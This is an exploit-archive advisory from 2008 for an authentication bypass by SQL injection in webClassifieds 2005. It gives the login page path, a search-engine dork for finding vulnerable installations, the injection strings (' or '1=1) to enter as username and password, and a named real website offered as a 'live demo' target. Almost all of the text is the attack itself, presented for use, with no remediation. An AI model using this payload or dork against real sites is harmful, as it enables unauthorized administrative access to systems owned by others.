[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability
# Published : 2008-12-29
# Author : AnGeL25dZ
# Previous Title : Pixel8 Web Photo Album 3.0 Remote SQL Injection Vulnerability
# Next Title : eDNews v2 (lg) Local File Inclusion Vulnerability


************************************************************
** 		 webClassifieds???? 2005 Admin Login Bypass vulnerability
************************************************************
**  Prodcut:		webClassifieds???? 2005    
**  Home   : 		http://www.webscribble.com/
**  Vunlerability :		Admin Bypass
**  Risk  :			low
**  Dork : 		"powered by webClassifieds"
************************************************************
** Discovred by:	AnGeL25dZ
** From	       :	Constantine - Algeria
** Contact     : 	angel25dz@gmail.com	
** *********************************************************
** Greetz to :	 ALLAH 
**		 All Members of HackTeachTeam    http://www.hackteach.org/
** 		 cold zero, Ra3ch, His0k4
************************************************************
**  Exploit:
**  http://[PATH]//classifieds/index.php?page=sign_in
**
**  user :              admin      /        user :           ' or '1=1
**  password :     ' or '1=1   /        password:    ' or '1=1
**  
****************************************************************
** Live demo : http://www.towpartners.com/classifieds/index.php?page=sign_in
****************************************************************

# www.Syue.com [2008-12-29]